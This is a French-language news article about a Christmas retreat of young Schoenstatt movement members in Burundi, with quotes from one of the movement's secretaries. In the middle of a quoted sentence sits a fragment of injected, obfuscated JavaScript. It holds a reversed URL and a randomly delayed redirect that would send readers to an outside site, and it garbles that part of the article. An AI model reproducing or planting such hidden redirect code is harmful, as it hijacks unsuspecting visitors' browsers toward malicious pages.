Les militants dans la salle du centre Joseph Engling

Le centre Joseph Engling de Mont Sion Gikungu avait accueilli depuis   le mercredi  26 décembre une quatre vingtaine de jeunes venant de différents diocèses de l’Eglise Catholique du Burundi. Ce sont des Schoenstattiens de la branche masculine qui ont été invités dans une retraite.

Une seule voix se laisse entendre dans la salle du Centre Joseph Engling. La salle  est presque pleine ce jeudi 27 décembre de garçons jeunes et adultes. Stylos dans les mains, ils suivent calmement le conférencier du Jour. Les uns dans des tricots, d’autres avec les foulards et les insignes qui caractérisent le Mouvement Apostolique de Schoenstatt, l’apparence montre qu’ils sont fiers d’être là.

Dans l’alliance d’amour avec Marie, bâtissons une famille fidèle au charisme du Père. »Telle est la devise de leur retraite.

Fidèle BARINAKANDI

L’objectif de cette retraite comme nous l’a signalé Fidèle BARINAKANDI un des Secrétaires du Mouvement, n’est autre que le  renouvellement de l’engagement pour les uns, et l’engagement pour les autres comme membres militants : « Pendant le temps de Noël, nous organisons chaque fois une retraite pour les militants. C’est un groupe des jeunes qui ont scellé l’Alliance d’Amour avec la Sainte Vierge, mais qui veulent s’engager de plus que les autres dans l’apostolat et dans la prière. C’est une manière de s’autoévaluer  et voir ce qu’ils ont pu réaliser durant toute l’année dans leur apostolat. C’est aussi une occasion pour eux de projeter l’avenir en s’engageant de nouveau. »

Les militants sont ceux qui ont scellé l’alliance d’amour, et ils forment un groupe. Sur la question de savoir si ce n’est pas une autre branche du Mouvement, Fidèle éclaire : « Ce n’est pas une autre branche. Plutôt, les militants s’engagent dans leurs branches d’appartenance pour la renforcer, et se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner corps et âme pour l’apostolat. »

Est-ce une autre alliance d’amour ?

A cette question, Mr Fidèle répond : « Ce n’est pas une autre alliance, c’est plutôt la façon de concrétiser et renforcer l’Alliance d’Amour  qu’ils ont scellé. Ils s’engagent à vivre de nouveau leur Alliance d’Amour.

Signalons que cette retraite va prendre fin samedi le 29 décembre avec l’engagement pour les uns et le renouvellement de l’engagement pour d’autres.                                            B.I

Laisser un commentaire